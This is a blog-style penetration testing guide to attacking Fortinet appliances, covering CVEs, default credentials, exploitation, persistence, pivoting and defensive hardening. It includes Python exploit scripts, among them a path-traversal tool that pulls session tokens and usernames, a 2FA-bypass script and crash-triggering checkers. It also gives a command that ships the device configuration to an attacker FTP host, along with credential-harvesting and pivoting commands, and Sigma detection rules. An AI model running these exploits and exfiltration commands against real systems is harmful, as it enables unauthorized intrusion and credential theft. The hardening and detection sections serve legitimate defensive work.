A Pentester's Guide to Fortinet: Exploits, Misconfigurations, and Red Team Tactics

-
Date: February 12, 2026
Target Audience: Intermediate to Advanced Penetration Testers, Bug Bounty Hunters, Red Teamers
Disclaimer: This article is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.

📋 Table of Contents

🎯 Introduction

Fortinet's security appliances, particularly its FortiGate firewalls, are ubiquitous in corporate and government networks worldwide. Their widespread deployment makes them a high-value target for security researchers, bug bounty hunters, and malicious actors alike. This comprehensive guide provides technical depth for intermediate to advanced penetration testers and red teamers on assessing Fortinet environments.

We will explore the complete attack surface, dissect critical vulnerabilities from the last five years, demonstrate exploitation techniques with working Proof-of-Concept (PoC) code, examine post-exploitation persistence mechanisms, and provide defensive hardening measures. This article is designed to be a complete reference for security professionals conducting authorized assessments of Fortinet infrastructure.

📌 Key Focus Areas:
  • 30+ CVEs from 2021-2026 with technical analysis
  • Working exploit code and PoCs
  • Default credentials and common misconfigurations
  • Post-exploitation techniques and persistence
  • Detection and mitigation strategies

🔍 The Fortinet Attack Surface

A thorough understanding of the attack surface is critical before launching an assessment. For Fortinet products, the primary points of entry are often remotely accessible services that are, by design, exposed to the internet.

Primary Attack Vectors

Component Default Ports Risk Level Common Vulnerabilities
SSL-VPN Portal 443, 8443, 10443 CRITICAL Pre-auth RCE, Path Traversal, Authentication Bypass
Web Admin Interface 443, 4443 HIGH Brute Force, Default Credentials, XSS, CSRF
FortiClient EMS 8013, 8443 CRITICAL SQL Injection, RCE
FortiManager/FortiAnalyzer 443, 541 HIGH Authentication Bypass, Information Disclosure
⚠️ Critical Note: The SSL-VPN service is arguably the most targeted component. It provides remote access to internal networks and has been the source of numerous critical pre-authentication Remote Code Execution (RCE) vulnerabilities that have been actively exploited by nation-state actors.

Information Disclosure Endpoints

Several endpoints can leak valuable information without authentication:

/remote/info                     # Reveals salt, version, hostname
/remote/login                    # Login page with version info
/remote/logincheck               # Authentication endpoint
/remote/hostcheck_validate       # Vulnerable endpoint (multiple CVEs)
/api/v2/monitor/system/status    # System information (if accessible)

🔑 Default Credentials & Common Misconfigurations

Often, the path of least resistance is not a zero-day exploit but a simple misconfiguration or the use of default credentials. Fortinet appliances are no exception.

Default Credentials

By default, FortiGate devices ship with a well-known administrator account:

Field Value
Username admin
Password (blank/empty)
Default IPs 192.168.1.99, 192.168.1.2, 10.0.0.1, 10.10.10.1
⚠️ Important: While the system forces a password change on first login, devices that are not properly provisioned or are reset to factory defaults can be found exposed with these credentials.

Common Security Misconfigurations

Misconfiguration Risk Level Description Exploitation
Exposed Management Interface CRITICAL Admin UI accessible from WAN Brute force, credential stuffing, exploit delivery
Unrestricted SSL-VPN HIGH SSL-VPN accessible from any IP Pre-auth RCE exploitation, credential attacks
No MFA on Admin/VPN HIGH Single-factor authentication only Credential compromise leads to full access
Outdated Firmware CRITICAL Unpatched vulnerabilities Known exploit usage (CVE-2022-42475, etc.)
FortiCloud SSO Enabled CRITICAL SSO without proper verification Authentication bypass (CVE-2026-24858)
Permissive Firewall Rules MEDIUM Overly broad rules (any-any-allow) Lateral movement after initial compromise

🚨 Critical Vulnerabilities: A Five-Year Retrospective (2021-2026)

The last five years have seen a steady stream of critical vulnerabilities in Fortinet products. The most severe of these often allow for unauthenticated remote code execution and have been actively exploited in the wild.

🔥 Threat Landscape: Multiple nation-state actors, particularly Chinese APT groups, have been observed exploiting Fortinet vulnerabilities to compromise government, manufacturing, and critical infrastructure organizations. The BOLDMOVE malware family has been deployed via these exploits.

💥 The Unholy Trinity of SSL-VPN RCEs

A series of critical heap-based and out-of-bounds write vulnerabilities in the SSL-VPN component have been actively exploited by threat actors. These three CVEs are often chained together in sophisticated attacks:

CVE-2022-42475 CVSS 9.8

Technical Details

Type: Heap-based buffer overflow in sslvpnd

Impact: Pre-authentication Remote Code Execution

Affected Versions: FortiOS 7.2.0-7.2.2, 7.0.0-7.0.8, 6.4.0-6.4.10, 6.2.0-6.2.11, 6.0.15 and earlier

Exploitation: Remote unauthenticated attacker can execute arbitrary code via specially crafted HTTP requests

Discovery: Found in the wild during investigation of compromised FortiGate firewall

Attribution: Chinese nation-state actors (Mandiant)

CVE-2023-27997 (XORtigate) CVSS 9.8

Technical Details

Type: Heap-based buffer overflow in sslvpnd

Impact: Pre-authentication Remote Code Execution

Affected Versions: FortiOS 7.2.0-7.2.4, 7.0.0-7.0.11, 6.4.0-6.4.12, 6.2.0-6.2.13, 6.0.0-6.0.16

Exploitation: Heap overflow via malformed SSL-VPN requests, exploitable for RCE

Research: Detailed exploitation research by Lexfo and Bishop Fox

Nickname: "XORtigate" due to custom XOR-based encryption in the exploit

CVE-2024-21762 CVSS 9.8

Technical Details

Type: Out-of-bounds write in sslvpnd

Impact: Pre-authentication Remote Code Execution

Affected Versions: FortiOS 7.4.0-7.4.2, 7.2.0-7.2.6, 7.0.0-7.0.13, 6.4.0-6.4.14, 6.2.0-6.2.15

Exploitation: Out-of-bounds write with just a 2-byte overwrite ("Two Bytes is Plenty")

Research: Detailed analysis by Assetnote

Status: Actively exploited in the wild (CISA KEV)

⚠️ Critical Warning: These three vulnerabilities are frequently chained together in attacks. CISA has issued multiple advisories about active exploitation. Organizations running vulnerable versions should patch immediately or disable SSL-VPN as a temporary mitigation.

🔓 Authentication Bypass Vulnerabilities

Bypassing authentication is another critical attack vector that has plagued Fortinet products:

CVE-2020-12812 CVSS 9.8

2FA Bypass via Username Case Manipulation

Type: Authentication Bypass

Affected: FortiOS 6.4.0-6.4.1, 6.2.0-6.2.3, 6.0.10 and earlier

Root Cause: Inconsistent handling of username case sensitivity between FortiOS and LDAP servers

Exploitation: Attacker with valid credentials can bypass 2FA by changing username case (e.g., "admin" → "Admin")

Recent Activity: Observed being actively exploited in December 2025

CVE-2026-24858 CVSS 9.8

FortiCloud SSO Authentication Bypass

Type: Authentication Bypass Using Alternate Path

Affected: FortiOS, FortiProxy, FortiManager, FortiAnalyzer, FortiWeb

Impact: Administrative access without credentials

Note: Users vulnerable even if they updated to address CVE-2025-59718/59719

Status: Actively exploited (January 2026)

CVE-2025-59718 & CVE-2025-59719 CVSS 9.8

FortiCloud SSO Cryptographic Signature Bypass

Type: Improper Verification of Cryptographic Signature

Affected: FortiOS, FortiProxy, FortiSwitchManager, FortiWeb

Versions: FortiOS 7.6.0-7.6.3, 7.4.0-7.4.8, and earlier

Impact: Complete authentication bypass for FortiCloud SSO

Status: Actively exploited (December 2025)

📂 Path Traversal and SQL Injection

CVE-2018-13379 CVSS 9.8

SSL-VPN Path Traversal

Type: Path Traversal / Arbitrary File Read

Affected: FortiOS 6.0.0-6.0.4, 5.6.3-5.6.7, 5.4.6-5.4.12

Impact: Download system files including plaintext credentials

Target File: /dev/cmdb/sslvpn_websession

Credentials Exposed: Usernames, passwords, session tokens

Exploitation: Simple HTTP GET request, no authentication required

CVE-2023-48788 CVSS 9.3

FortiClient EMS SQL Injection

Type: SQL Injection → Remote Code Execution

Affected: FortiClient EMS 7.2.0-7.2.2, 7.0.1-7.0.10

Impact: Unauthenticated RCE via SQL injection

Post-Exploitation: Deployment of RMM tools and PowerShell backdoors

Research: Detailed analysis by Red Canary and Horizon3

CVE-2026-21643 CVSS 9.1

FortiClientEMS SQL Injection

Type: SQL Injection

Affected: FortiClientEMS (latest advisory February 2026)

Impact: Unauthenticated code execution

Status: Recently disclosed, patch available

🔬 Deep Dive: Exploiting CVE-2024-21762

The exploit for CVE-2024-21762, as detailed by researchers at Assetnote, is a masterclass in modern heap exploitation. The vulnerability is an out-of-bounds write in the sslvpnd process when handling HTTP requests.

CVE-2024-21762 Exploit Workflow
Figure: The exploit chain for CVE-2024-21762, showing the complete attack flow from heap spray to RCE (Source: Assetnote)

Exploitation Workflow

Step Technique Description
1 Heap Spray Attacker sprays the heap with controlled data to create predictable memory layout
2 Trigger Vulnerability Specially crafted request triggers out-of-bounds write with *0x401 overwrite
3 Pointer Corruption Saved pointer is shifted to sprayed region and dereferenced to *bk_qb_handshake
4 Control Function Pointer Function pointer in forged SSL struct is called, starting ROP chain
5 ROP Chain Execution ROP chain sets up stack and calls exec() or system()
6 Payload Execution Execute reverse shell (Node.js or other payload)
💡 Key Insight: The vulnerability is notable for requiring only a 2-byte overwrite to achieve full RCE, hence the research title "Two Bytes is Plenty". This demonstrates the fragility of memory safety in the SSL-VPN daemon.

Heap Allocator Details

FortiOS uses jemalloc as its main allocator, which has several characteristics that make exploitation more predictable:

  • Contiguous allocations: No heap metadata between chunks
  • LIFO freelists: Chunks can be reliably reclaimed
  • No hardening: Lacks countermeasures like GNU libc malloc
  • Predictable size classes: Memory organized in well-defined size ranges

💻 Proof-of-Concept Code Examples

⚠️ Legal Disclaimer: The following code is provided for educational purposes and authorized security testing only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.

CVE-2024-21762: Vulnerability Checker

#!/usr/bin/env python3
import requests
import sys

# PoC to trigger CVE-2024-21762 and check for vulnerability
# Based on research from Assetnote and Bishop Fox

if len(sys.argv) != 2:
    print(f"Usage: python {sys.argv[0]} <target_ip:port>")
    sys.exit(1)

target = sys.argv[1]
url = f"https://{target}/remote/hostcheck_validate"

# Simplified payload to trigger the OOB write
# Real exploit requires careful heap grooming and ROP chain
data = {
    'enc': 'A'*4097  # Causes an out-of-bounds write
}

try:
    print("[+] Sending payload to trigger CVE-2024-21762...")
    requests.post(url, data=data, verify=False, timeout=5)
except requests.exceptions.ReadTimeout:
    print("[+] Target appears VULNERABLE! Connection timed out (crash)")
except requests.exceptions.ConnectionError as e:
    print(f"[+] Target appears VULNERABLE! Connection reset: {e}")
except Exception as e:
    print(f"[-] Error occurred: {e}")

CVE-2018-13379: Path Traversal Exploit

#!/usr/bin/env python3
import requests
import re
import sys

# Exploit CVE-2018-13379 to download sslvpn_websession file
# Contains plaintext usernames and passwords

def exploit_cve_2018_13379(target):
    url = f"https://{target}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Connection": "close"
    }
    
    try:
        print(f"[*] Attempting to exploit CVE-2018-13379 on {target}")
        r = requests.get(url, headers=headers, verify=False, timeout=5)
        content = r.content
        
        if b"var fgt_lang =" in content:
            print("[+] SUCCESS! Vulnerable to CVE-2018-13379")
            
            # Save the file
            filename = f"sslvpn_websession_{target.replace(':', '_')}.dat"
            with open(filename, 'wb') as f:
                f.write(content)
            print(f"[+] Session file saved: {filename}")
            
            # Parse credentials
            text = content.decode('utf-8', errors='ignore')
            usernames = re.findall(r'username["\s:=]+([^"\\s]+)', text)
            sessions = re.findall(r'websession["\s:=]+([a-f0-9]{40,})', text)
            
            if usernames:
                print(f"[+] Found usernames: {', '.join(set(usernames))}")
            if sessions:
                print(f"[+] Found session tokens: {len(sessions)} tokens")
                print("[!] Use these tokens to replay sessions without passwords")
            
            return True
        else:
            print("[-] Target does not appear vulnerable")
            return False
            
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} <target_ip:port>")
        sys.exit(1)
    
    exploit_cve_2018_13379(sys.argv[1])

CVE-2023-27997: Timing-Based Vulnerability Scanner

#!/usr/bin/env python3
import requests
import time
import sys

# Non-intrusive scanner for CVE-2023-27997 (XORtigate)
# Based on timing analysis from Bishop Fox research

def check_cve_2023_27997(target):
    url = f"https://{target}/remote/hostcheck_validate"
    
    # Measure normal request timing
    start = time.time()
    try:
        requests.post(url, data={'enc': 'test'}, verify=False, timeout=3)
    except:
        pass
    normal_time = time.time() - start
    
    # Measure malformed request timing (triggers vulnerability)
    start = time.time()
    try:
        requests.post(url, data={'enc': 'A'*8192}, verify=False, timeout=3)
    except:
        pass
    malformed_time = time.time() - start
    
    # Vulnerable systems show significant timing difference
    if malformed_time > (normal_time * 2):
        print(f"[+] {target} is LIKELY VULNERABLE to CVE-2023-27997")
        print(f"    Normal response: {normal_time:.2f}s")
        print(f"    Malformed response: {malformed_time:.2f}s")
        return True
    else:
        print(f"[-] {target} does not appear vulnerable")
        return False

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} <target_ip:port>")
        sys.exit(1)
    
    check_cve_2023_27997(sys.argv[1])

CVE-2020-12812: 2FA Bypass via Case Manipulation

#!/usr/bin/env python3
import requests
import sys

# Exploit CVE-2020-12812: Bypass 2FA via username case manipulation
# Works when LDAP authentication is used

def bypass_2fa_cve_2020_12812(target, username, password):
    url = f"https://{target}/remote/logincheck"
    
    # Generate username case variations
    variations = [
        username.upper(),
        username.lower(),
        username.capitalize(),
        username.swapcase()
    ]
    
    # Add custom variations for common usernames
    if username.lower() == 'admin':
        variations.extend(['Admin', 'ADMIN', 'aDmIn', 'AdMiN'])
    
    print(f"[*] Attempting 2FA bypass for user: {username}")
    
    for variant in set(variations):
        data = {
            'username': variant,
            'secretkey': password,
            'ajax': 1
        }
        
        print(f"[*] Trying: {variant}")
        
        try:
            r = requests.post(url, data=data, verify=False, timeout=5)
            
            # Check for successful authentication
            if 'ret=1' in r.text or 'redir=' in r.text:
                print(f"[+] SUCCESS! 2FA BYPASSED with username: {variant}")
                print(f"[+] Response: {r.text[:200]}")
                return True
                
        except Exception as e:
            print(f"[-] Error with {variant}: {e}")
    
    print("[-] 2FA bypass failed for all variations")
    return False

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python3 {sys.argv[0]} <target> <username> <password>")
        sys.exit(1)
    
    bypass_2fa_cve_2020_12812(sys.argv[1], sys.argv[2], sys.argv[3])

Multi-CVE Scanner Script

#!/usr/bin/env python3
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning

# Suppress SSL warnings
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def banner():
    print("""
╔═══════════════════════════════════════════════════════╗
║   Fortinet Multi-CVE Scanner                         ║
║   CVE-2018-13379 | CVE-2023-27997 | CVE-2024-21762  ║
╚═══════════════════════════════════════════════════════╝
    """)

def check_version(target):
    try:
        r = requests.get(f"https://{target}/remote/info", 
                        verify=False, timeout=3)
        if 'salt=' in r.text:
            print(f"[+] Target is a FortiGate device")
            return True
    except:
        pass
    return False

def scan_target(target):
    print(f"\n[*] Scanning {target}")
    
    if not check_version(target):
        print("[-] Target does not appear to be FortiGate")
        return
    
    # Check CVE-2018-13379
    try:
        r = requests.get(
            f"https://{target}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession",
            verify=False, timeout=3
        )
        if b"var fgt_lang =" in r.content:
            print("[!] VULNERABLE to CVE-2018-13379 (Path Traversal)")
    except:
        print("[-] Not vulnerable to CVE-2018-13379")
    
    # Check for SSL-VPN exposure
    try:
        r = requests.get(f"https://{target}/remote/login", 
                        verify=False, timeout=3)
        if r.status_code == 200:
            print("[!] SSL-VPN portal is EXPOSED")
            print("    Potentially vulnerable to CVE-2022-42475, CVE-2023-27997, CVE-2024-21762")
    except:
        print("[-] SSL-VPN not accessible")

if __name__ == "__main__":
    banner()
    if len(sys.argv) != 2:
        print(f"Usage: python3 {sys.argv[0]} <target_ip:port>")
        sys.exit(1)
    
    scan_target(sys.argv[1])

🎭 Post-Exploitation and Persistence

Gaining initial access is only the beginning. Sophisticated threat actors focus on maintaining persistence and evading detection.

Malicious File Creation (2025 Campaign)

As reported by CISA in April 2025, threat actors have been observed using a post-exploitation technique involving the creation of a malicious file on compromised FortiGate devices. This technique often follows exploitation of the "unholy trinity" CVEs.

🔥 Active Threat: This malicious file provides read-only access to the filesystem, allowing exfiltration of configuration files containing sensitive information such as:
  • VPN credentials and certificates
  • Firewall rules and network topology
  • LDAP/AD integration credentials
  • API keys and service account tokens

SSL-VPN Symlink Persistence (CVE-2025-68686)

Symlink Persistence Technique

CVE: CVE-2025-68686

Method: Manipulation of symbolic links during boot process

Requirement: SSL-VPN must be enabled

Impact: Persistent read-only filesystem access

Detection: Difficult to detect without firmware integrity checks

Removal: Requires firmware upgrade to 7.6.2, 7.4.7, 7.2.11, 7.0.17, or 6.4.16

Configuration Extraction

Once access is obtained, extracting the configuration is a priority:

# Via CLI (if you have shell access)
execute backup config ftp backup.conf ftp.attacker.com user pass

# Via web interface
# Navigate to: System > Configuration > Backup

# Parse configuration for sensitive data
strings fortigate_config.conf | grep -iE "password|secret|key"

# Extract VPN credentials
strings fortigate_config.conf | grep -A5 "config vpn"

# Find internal network ranges
strings fortigate_config.conf | grep -E "subnet|range"

Backdoor Deployment

Threat actors have deployed various backdoors on compromised FortiGate devices:

Malware Family Type Capabilities Attribution
BOLDMOVE Backdoor Command execution, file exfiltration, persistence Chinese APT (Mandiant)
Trojanized Firmware Persistent Backdoor Survives reboots, firmware updates Nation-state actors
Web Shells Remote Access Command execution via HTTP Various threat actors

✅ Red Teamer's Methodology

When approaching a Fortinet target, a structured methodology is essential for success:

Phase 1: Reconnaissance

# Port scanning
nmap -p 443,4443,8443,10443,541 -sV -sC target.com

# Service enumeration
curl -k https://target.com/remote/info
curl -k https://target.com/remote/login

# Version detection
curl -I -k https://target.com/ | grep Server

# SSL certificate analysis
openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -text

Phase 2: Vulnerability Assessment

Check Tool/Method Priority
CVE-2018-13379 Path traversal PoC CRITICAL
CVE-2023-27997 Timing-based scanner CRITICAL
CVE-2024-21762 OOB write checker CRITICAL
Default Credentials admin:(blank) HIGH
SSL-VPN Exposure /remote/login check HIGH

Phase 3: Exploitation

  1. Prioritize pre-authentication RCEs if target is vulnerable
  2. Attempt default credentials (admin with no password)
  3. Test authentication bypasses (CVE-2020-12812 if credentials known)
  4. Exploit path traversal (CVE-2018-13379) to obtain credentials
  5. Deploy payload (reverse shell, implant, backdoor)

Phase 4: Post-Exploitation

  • Extract configuration file
  • Dump credentials and session tokens
  • Map internal network topology
  • Establish persistence (if authorized)
  • Pivot to internal systems

🎯 Advanced Red Team Techniques

Pivoting Through FortiGate

FortiGate devices are gateways to internal networks. After compromise:

# Method 1: SOCKS proxy via SSH (if SSH enabled)
ssh -D 9050 admin@fortigate_ip

# Configure proxychains
echo "socks5 127.0.0.1 9050" >> /etc/proxychains.conf

# Use proxychains for internal scanning
proxychains nmap -sT 10.0.0.0/24

# Method 2: Port forwarding
ssh -L 3389:internal_server:3389 admin@fortigate_ip

# Method 3: VPN credential reuse
# Use extracted VPN credentials to access internal network as legitimate user

Credential Harvesting

# Extract all passwords from config
strings config.conf | grep -iE "(password|passwd|pwd|secret)" -A2 -B2

# Decode FortiGate password hashes (if applicable)
# FortiGate uses custom encoding for some passwords

# Extract LDAP/AD credentials
strings config.conf | grep -A10 "config user ldap"

# Find VPN user credentials
strings config.conf | grep -A5 "config vpn ssl web user"

Persistence Techniques

Technique Stealth Persistence Detection Difficulty
Create admin account Low Until password change Easy (log review)
Modify existing account Medium Until detected Medium (config audit)
Symlink manipulation High Survives reboots Hard (requires forensics)
Firmware trojanization Very High Survives updates Very Hard (integrity check)

📊 Complete CVE List (2021-2026)

2026 CVEs

CVE ID CVSS Type Product Status
CVE-2026-24858 9.8 Auth Bypass FortiOS, FortiProxy, FortiManager, FortiAnalyzer, FortiWeb 🔥 Exploited
CVE-2026-22153 9.8 Auth Bypass FortiOS (LDAP) ⚠️ Active
CVE-2026-21643 9.1 SQLi → RCE FortiClientEMS ⚠️ Active

2025 CVEs

CVE ID CVSS Type Product Status
CVE-2025-59718 9.8 Auth Bypass FortiOS, FortiProxy, FortiSwitchManager, FortiWeb 🔥 Exploited
CVE-2025-59719 9.8 Auth Bypass Multiple Products 🔥 Exploited
CVE-2025-68686 8.1 Info Disclosure FortiOS SSL-VPN ⚠️ Active
CVE-2025-64157 8.8 Format String FortiGate (CAPWAP) Patched
CVE-2025-64153 7.2 Command Injection FortiExtender Patched
CVE-2025-67685 8.8 SSRF FortiSandbox Patched
CVE-2025-55018 9.8 Request Smuggling FortiOS GUI Patched
CVE-2025-25249 9.8 Buffer Overflow FortiOS, FortiSwitchManager Patched

2024 CVEs

CVE ID CVSS Type Product Status
CVE-2024-21762 9.8 RCE (OOB Write) FortiOS, FortiProxy 🔥 Exploited (CISA KEV)
CVE-2024-55591 7.5 Various FortiOS, FortiProxy Patched
CVE-2024-47570 4.9 Info Disclosure FortiOS, FortiProxy, FortiPAM Patched
CVE-2024-40593 4.9 Key Management FortiManager, FortiAnalyzer Patched

2023 CVEs

CVE ID CVSS Type Product Status
CVE-2023-27997 9.8 RCE (Heap Overflow) FortiOS, FortiProxy 🔥 Exploited (XORtigate)
CVE-2023-37936 9.6 Hardcoded Key FortiSwitch 🔥 Exploited
CVE-2023-48788 9.3 SQLi → RCE FortiClientEMS 🔥 Exploited

2022 CVEs

CVE ID CVSS Type Product Status
CVE-2022-42475 9.8 RCE (Heap Overflow) FortiOS, FortiProxy 🔥 Exploited (Nation-state)
CVE-2022-23439 8.2 SSRF (Host Header) Multiple Products Patched

2018-2021 (Still Relevant)

CVE ID CVSS Type Product Status
CVE-2018-13379 9.8 Path Traversal FortiOS SSL-VPN 🔥 Still Exploited
CVE-2020-12812 9.8 2FA Bypass FortiOS (LDAP) 🔥 Recently Active (Dec 2025)
CVE-2021-44168 7.8 Local Privilege Escalation FortiOS Used in Research
🔥 Key Takeaway: The "unholy trinity" (CVE-2022-42475, CVE-2023-27997, CVE-2024-21762) are frequently chained together in attacks and have been used by nation-state actors to compromise critical infrastructure. Organizations must prioritize patching these vulnerabilities.

🐙 GitHub Resources and Tools

Official Vulnerability Scanners

Bishop Fox Research

Bishop Fox has released several high-quality vulnerability scanners:

CVE-2023-27997 Scanner CVE-2024-21762 Scanner

Exploit PoCs

CVE Repository Type
CVE-2018-13379 kh4sh3i/CVE-2018-13379 Path traversal scanner with credential extraction
CVE-2022-42475 scrt/cve-2022-42475 Heap overflow PoC
CVE-2022-42475 0xhaggis/CVE-2022-42475 Alternative PoC with shellcode
CVE-2023-27997 lexfo/xortigate-cve-2023-27997 Original research and PoC
CVE-2024-21762 abrewer251/CVE-2024-21762_FortiNet_PoC Python PoC
CVE-2024-21762 h4x0r-dz/CVE-2024-21762 Out-of-bounds write exploit
Multi-CVE anasbousselham/fortiscan High-performance multi-CVE scanner

Nuclei Templates

For automated scanning with Nuclei:

# Install Nuclei
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

# Update templates
nuclei -update-templates

# Scan for all Fortinet vulnerabilities
nuclei -u https://target.com -t cves/ -tags fortinet

# Scan for specific CVE
nuclei -u https://target.com -t cves/2018/CVE-2018-13379.yaml

# Scan multiple targets
nuclei -l targets.txt -t cves/ -tags fortinet -o results.txt

🛡️ Mitigation and Hardening

Defending against these attacks requires a multi-layered approach:

Immediate Actions

Priority Action Impact
CRITICAL Patch to latest firmware Eliminates known vulnerabilities
CRITICAL Disable SSL-VPN if not required Removes primary attack vector
HIGH Restrict admin interface to trusted IPs Prevents remote attacks on management
HIGH Enable MFA on all accounts Prevents credential-based attacks
HIGH Change default credentials Eliminates easy initial access

Configuration Hardening

# Restrict admin access to specific IPs
config system admin
    edit "admin"
        set trusthost1 10.0.0.0 255.255.255.0
    next
end

# Disable SSL-VPN (if not needed)
config vpn ssl settings
    set status disable
end

# Enable strong authentication
config system global
    set admin-lockout-threshold 3
    set admin-lockout-duration 300
end

# Enable IPS on all interfaces
config firewall policy
    edit 1
        set ips-sensor "default"
        set ssl-ssh-profile "certificate-inspection"
    next
end

# Disable unnecessary services
config system global
    set admin-telnet disable
    set admin-ssh-port 2222
end

Network Segmentation

  • Place FortiGate management on dedicated management VLAN
  • Implement strict firewall rules between management and production networks
  • Use jump hosts for administrative access
  • Implement network access control (NAC) for VPN users

Monitoring and Logging

# Enable comprehensive logging
config log memory setting
    set status enable
end

config log syslogd setting
    set status enable
    set server "siem.company.com"
    set port 514
end

# Log all administrative actions
config system global
    set admin-console-timeout 300
end

# Enable event logging
config log eventfilter
    set event enable
    set system enable
    set vpn enable
    set user enable
    set router enable
    set wireless-activity enable
end

🔍 Detection and Monitoring

Log Analysis

Monitor FortiGate logs for suspicious activity:

# Check for failed login attempts
execute log filter category 0
execute log display

# Monitor VPN connections
diagnose debug application sslvpn -1
diagnose debug enable

# Check for configuration changes
execute log filter category 3
execute log display

# Look for unusual admin activity
execute log filter field subtype admin
execute log display

SIEM Detection Rules

Sigma Rule: CVE-2018-13379 Exploitation

title: Fortinet CVE-2018-13379 Path Traversal Attempt
status: experimental
description: Detects attempts to exploit CVE-2018-13379
references:
    - https://www.fortiguard.com/psirt/FG-IR-18-384
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains:
            - '/remote/fgt_lang?lang=/'
            - 'sslvpn_websession'
            - '../../../../'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.initial_access
    - attack.t1190

Sigma Rule: SSL-VPN RCE Exploitation Attempts

title: Fortinet SSL-VPN RCE Exploitation Attempt
status: experimental
description: Detects exploitation attempts for CVE-2022-42475, CVE-2023-27997, CVE-2024-21762
logsource:
    product: fortinet
    service: fortigate
detection:
    selection:
        logdesc|contains:
            - 'Application crashed'
            - 'sslvpnd'
            - 'segfault'
    condition: selection
falsepositives:
    - Legitimate crashes (rare)
level: critical
tags:
    - attack.initial_access
    - attack.t1190

Indicators of Compromise (IOCs)

Indicator Type Indicator Description
File Path /data/etc/<suspicious_file> Malicious persistence file
Process Unexpected sslvpnd crashes Possible exploitation attempt
Network Unusual outbound connections from FortiGate Command and control traffic
Configuration Unauthorized admin accounts Persistence mechanism
Log Entry Multiple failed login attempts followed by success Brute force or credential stuffing

Forensic Investigation

If compromise is suspected:

# Check for unauthorized accounts
show system admin

# Review recent configuration changes
execute log filter category 3
execute log display

# Check running processes
diagnose sys top

# Review active sessions
diagnose sys session list

# Check for suspicious files
execute ssh-options enable
execute ssh <admin_ip>
ls -la /data/etc/
ls -la /bin/
find / -mtime -7 -type f 2>/dev/null

# Backup configuration for forensics
execute backup config ftp forensics.conf ftp.server.com user pass

🎓 Conclusion

Fortinet products remain a critical component of network security infrastructure worldwide, but their complexity and ubiquity create a fertile ground for vulnerabilities. As demonstrated throughout this comprehensive guide, a single misconfiguration or missed patch can provide attackers with the foothold they need to compromise entire networks.

Key Takeaways

For Penetration Testers and Red Teamers:
  • Prioritize testing for the "unholy trinity" of SSL-VPN RCEs (CVE-2022-42475, CVE-2023-27997, CVE-2024-21762)
  • Always check for CVE-2018-13379 path traversal as a quick win for credential access
  • Don't overlook simple misconfigurations like default credentials and exposed management interfaces
  • Post-exploitation persistence techniques are sophisticated and require firmware upgrades to remove
  • Use the provided PoC code responsibly and only in authorized engagements
For Defenders and Blue Teams:
  • Patch management is critical - apply security updates immediately upon release
  • Disable SSL-VPN if not required, or restrict access to known IP addresses
  • Implement multi-factor authentication on all administrative and VPN accounts
  • Monitor logs for exploitation attempts and unusual activity
  • Regular configuration audits can identify misconfigurations before attackers do
  • Network segmentation limits the impact of a successful compromise

The Threat Landscape

The persistent targeting of Fortinet infrastructure by nation-state actors, particularly Chinese APT groups, underscores the strategic value of these devices. The deployment of sophisticated malware like BOLDMOVE and the development of custom exploits demonstrate the resources adversaries are willing to invest in compromising these systems.

The recent surge in authentication bypass vulnerabilities (CVE-2025-59718, CVE-2025-59719, CVE-2026-24858) targeting FortiCloud SSO integration highlights an emerging attack vector that organizations must address. The fact that some of these bypasses work even after applying patches for earlier vulnerabilities demonstrates the cat-and-mouse nature of security.

Final Thoughts

For security professionals, understanding the attack surface, staying current with the latest CVEs, and mastering exploitation techniques is essential for both offensive and defensive operations. This guide has provided the technical depth required for advanced penetration testing and red team operations against Fortinet infrastructure, complete with working exploit code, detection strategies, and hardening recommendations.

Continuous vigilance, proactive hardening, and a deep understanding of attacker methodologies are the cornerstones of securing these powerful devices. Whether you're conducting authorized security assessments or defending critical infrastructure, the information in this guide provides the foundation for effective security operations.

⚠️ Ethical Reminder: All techniques and code in this article are provided for educational purposes and authorized security testing only. Unauthorized access to computer systems is illegal and unethical. Always obtain proper authorization before conducting security assessments.

📚 References

  1. Fortinet PSIRT Advisory FG-IR-22-398 - CVE-2022-42475
  2. Bishop Fox: Building an Exploit for FortiGate Vulnerability CVE-2023-27997
  3. Assetnote: Two Bytes is Plenty: FortiGate RCE with CVE-2024-21762
  4. Fortinet Community: Description of CVE-2020-12812 (2FA Bypass)
  5. Fortinet Document Library: SSL VPN Architecture
  6. GitHub: PoC for CVE-2018-13379
  7. Red Canary: Holding down the Fortinet vulnerability (CVE-2023-48788)
  8. CISA: Fortinet Releases Advisory on New Post-Exploitation Technique
  9. Fortinet PSIRT Advisories - Official Security Advisory Portal
  10. Bishop Fox: A More Complete Exploit for Fortinet CVE-2022-42475
  11. Fortinet: Analysis of CVE-2023-27997 and Clarifications on Volt Typhoon Campaign
  12. CISA: Fortinet Authentication Bypass CVE-2026-24858
  13. Google Cloud: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Espionage Actors
  14. Darktrace: Tracking and Containing a Real-World Fortinet SSL-VPN Attack
  15. Arctic Wolf: Malicious Configuration Changes on Fortinet FortiGate Devices

Last Updated: February 12, 2026

Tags: Fortinet, FortiGate, FortiOS, Penetration Testing, Red Team, Bug Bounty, CVE, Exploit, Security Research

Comments

Post a Comment

Popular posts from this blog

Tutorial: Build an AI Penetration Tester with Claude (MCP + Burp)

-
